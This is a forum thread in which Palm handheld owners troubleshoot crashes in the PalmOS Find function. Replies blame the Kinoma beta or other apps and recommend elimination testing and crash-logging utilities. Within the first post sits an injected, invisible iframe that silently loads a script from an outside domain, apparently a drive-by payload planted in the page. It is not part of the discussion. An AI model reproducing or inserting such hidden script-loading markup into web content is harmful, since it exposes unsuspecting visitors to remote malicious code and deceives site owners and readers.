+ Reply to Thread

How many people's Palm Find function causes Fatal Error?

OK, I've just done my first Find using the find function on the Graffiti area. I looked up the last name of a contact. It began it's search, found the contact in address book, then continued its search, and crashed with a Fatal Error / Reset alert.

I know this is a known issue for many. It just became my issue also. I have Launcher X, Agendus, WorldMate, Minute Counter, Acid Image, Quick Office (from CD) and TAKEphONE installed.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Did you install the new Kinoma beta? If so then that is your problem. Kinoma has already been notifed and will make the fix. Just delete kinoma and everything will work again.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Yes I did! Thank you. Problem has gone away!

WOOOO HOOOO!!!!!

Another satisfied customer!!!

GO Birdie, GO Birdie, it's your birthday, it's your birthday.......

sorry, kinda got carried away.

Byrd Dog
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Don't have kinoma and still crashes

I've had this a long time and never got around to posting. 100% of the time when I hit the "find more" button, i get a fatal alert: Memory mgr.CLine:4415, Invalid handle. Can anybody help?

Good place for Bill Gates SilvrDrgn's Avatar

Re: Don't have kinoma and still crashes

Originally posted by mama's_wired
    I've had this a long time and never got around to posting. 100% of the time when I hit the "find more" button, i get a fatal alert: Memory mgr.CLine:4415, Invalid handle. Can anybody help?
    The crashes with the PalmOS Find function are usually caused by a program that you have loaded that does not support the Find function. You'll need to figure out which program that is on your device (process of elimination) and get rid of it.
    Michael

Since "Find" reports the program it has finished, it's hard to tell which one it is. But you CAN find it by trying "Find" while running each suspect app. If it doesn't complete one (and report it) you've found the culprit. Good luck.

I had this problem at one point with the built-in PhotoSuite app, but you may not have this problem. One method of finding out the culprit for this crash (and any others) is to use Crash Pro ($5.99) which can log all fatal errors and automatically restart the device.

FindHack ($14.95) is also a good tool for creating custom sets of applications to search. If an app you like crashes in Find, you can create a search set that excludes it.